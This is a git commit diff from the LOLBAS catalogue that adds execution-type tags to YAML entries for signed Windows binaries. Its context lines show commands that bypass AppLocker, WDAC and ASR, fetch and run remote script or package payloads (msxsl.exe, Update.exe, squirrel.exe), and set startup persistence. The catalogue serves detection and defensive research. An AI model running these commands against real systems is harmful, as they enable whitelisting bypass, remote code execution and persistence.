mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
Adding Execute tags to most LOLBas (#405)
This commit is contained in:
@@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
|
||||
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
|
||||
Usecase: Local execution of managed code to bypass AppLocker.
|
||||
@@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
|
||||
|
@@ -18,6 +18,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: All Windows
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: adplus.exe -c config-adplus.xml
|
||||
Description: Dump process memory using adplus config file (see Resources section for a sample file).
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
@@ -32,6 +34,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: All windows
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: PowerShell
|
||||
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
|
||||
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
|
||||
Usecase: Execute a provided EXE
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: Administrator
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml
|
||||
Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.
|
||||
Usecase: Execute custom made MSI file with malicious code
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: Administrator
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: MSI
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe
|
||||
- Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
|
||||
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
|
||||
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
|
||||
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
|
||||
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
@@ -25,6 +29,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
||||
|
@@ -49,6 +49,7 @@ Commands:
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Execute: Remote
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
@@ -58,6 +59,7 @@ Commands:
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Detection:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Shellcode
|
||||
- Command: |
|
||||
cdb.exe -pd -pn <process_name>
|
||||
.shell <cmd>
|
||||
@@ -20,6 +22,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: cdb.exe -c C:\debug-script.txt calc
|
||||
Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
|
||||
Usecase: Run commands under a trusted Microsoft signed binary
|
||||
@@ -27,6 +31,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
||||
|
@@ -20,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1055
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
|
||||
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
|
||||
Usecase: Execute DLL code
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
|
||||
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: MSI
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\Tools\devinit\devinit.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\Tools\devinit\devinit.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7 and up with VS/VScode installed
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
|
||||
Description: The above binary will execute other binary.
|
||||
Usecase: Execute any binary with given arguments.
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7 and up with VS/VScode installed
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: 'c:\windows\system32\devtoolslauncher.exe'
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with .NET installed
|
||||
Tags:
|
||||
- Execute: DLL (.NET)
|
||||
- Command: dotnet.exe [PATH_TO_DLL]
|
||||
Description: dotnet.exe will execute any DLL.
|
||||
Usecase: Execute DLL
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with .NET installed
|
||||
Tags:
|
||||
- Execute: DLL (.NET)
|
||||
- Command: dotnet.exe fsi
|
||||
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
|
||||
Usecase: Execute arbitrary F# code
|
||||
@@ -25,6 +29,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 and up with .NET SDK installed
|
||||
Tags:
|
||||
- Execute: FSharp
|
||||
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
|
||||
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
|
||||
Usecase: Execute code bypassing AWL
|
||||
@@ -32,6 +38,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 and up with .NET Core installed
|
||||
Tags:
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: 'C:\Program Files\dotnet\dotnet.exe'
|
||||
Detection:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\dxcap.exe
|
||||
- Path: C:\Windows\SysWOW64\dxcap.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: FSharp
|
||||
- Command: fsi.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: FSharp
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: FSharp
|
||||
- Command: fsianycpu.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: FSharp
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: Mftrace.exe powershell.exe
|
||||
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
|
||||
Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
|
||||
Description: Launch calc.bat via msdeploy.exe.
|
||||
Usecase: Local execution of batch file using msdeploy.exe.
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe
|
||||
Description: Copy file from source to destination.
|
||||
Usecase: Copy file.
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1220
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: XSL
|
||||
- Command: msxsl.exe customers.xml script.xsl
|
||||
Description: Run COM Scriptlet code within the script.xsl file (local).
|
||||
Usecase: Local execution of script stored in XSL file.
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1220
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: XSL
|
||||
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
||||
@@ -25,6 +29,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1220
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: XSL
|
||||
- Execute: Remote
|
||||
- Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
||||
@@ -32,6 +39,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1220
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: XSL
|
||||
- Execute: Remote
|
||||
- Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>
|
||||
Description: Using remote XML and XSL files, save the transformed XML file to disk.
|
||||
Usecase: Download a file from the internet and save it to disk.
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: CSharp
|
||||
- Command: rcsi.exe bypass.csx
|
||||
Description: Use embedded C# within the csx script to execute the code.
|
||||
Usecase: Local execution of arbitrary C# code stored in local CSX file.
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: Remote.exe /s "powershell.exe" anythinghere
|
||||
Description: Spawns powershell as a child process of remote.exe
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
|
||||
Description: Run a remote file
|
||||
Usecase: Executing a remote binary without saving file to disk
|
||||
@@ -25,6 +29,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
|
||||
Code_Sample:
|
||||
|
@@ -18,6 +18,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: squirrel.exe --update [url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
@@ -25,6 +28,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: squirrel.exe --updateRollback=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
@@ -32,6 +38,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: squirrel.exe --updateRollback=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
@@ -39,6 +48,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Squirrel.exe'
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: te.exe test.dll
|
||||
Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.
|
||||
Usecase: Execute DLL file.
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Node.JS
|
||||
- Command: teams.exe
|
||||
Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
|
||||
Usecase: Execute JavaScript code
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Node.JS
|
||||
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
|
||||
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
@@ -25,6 +29,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Teams.exe'
|
||||
Code_Sample:
|
||||
|
@@ -18,6 +18,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --update=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
@@ -25,6 +28,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
Usecase: Download and execute binary
|
||||
@@ -32,6 +38,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
Usecase: Download and execute binary
|
||||
@@ -39,6 +48,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --updateRollback=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
@@ -46,6 +58,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --updateRollback=[url to package]
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||
Usecase: Download and execute binary
|
||||
@@ -53,6 +68,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||
Usecase: Application Whitelisting Bypass
|
||||
@@ -60,6 +78,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
Usecase: Download and execute binary
|
||||
@@ -67,6 +88,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
Usecase: Download and execute binary
|
||||
@@ -74,6 +98,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||
Usecase: Execute binary
|
||||
@@ -81,6 +108,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
||||
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
||||
Usecase: Execute binary
|
||||
@@ -88,6 +117,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1547
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
|
||||
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
|
||||
Usecase: Execute binary
|
||||
@@ -95,6 +126,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1070
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
Full_Path:
|
||||
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
|
||||
Code_Sample:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe"
|
||||
Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.
|
||||
Usecase: Proxy execution of binary with arguments
|
||||
@@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
|
||||
Detection:
|
||||
|
@@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 and up with VS/VScode installed
|
||||
Tags:
|
||||
- Execute: EXE
